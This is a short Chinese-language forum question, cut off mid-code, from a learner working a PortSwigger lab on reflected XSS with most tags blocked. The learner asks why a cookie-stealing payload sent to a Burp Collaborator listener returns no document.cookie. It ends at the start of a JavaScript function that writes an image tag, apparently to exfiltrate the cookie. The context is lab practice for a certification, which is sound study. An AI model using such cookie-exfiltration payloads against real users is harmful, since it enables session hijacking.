我正忙着做portswigger实验室的研究,做的是“将XSS反射到HTML上下文中,大多数标记和属性被阻塞”。
我成功地在自己和模拟受害者身上触发print(),但是为了在准备burp套件考试方面进行额外的练习,我正在尝试扩展我的利用服务器体代码内容,以从带内窃取受害者cookie中的burp合作者。模拟受害者单击任何链接发送。
下面的漏洞攻击服务器体代码,但是在我的OOB侦听服务器中没有document.cookie值。是可能的,还是受害者cookie设置了httponly?
function StealCookies() {
document.write('<img s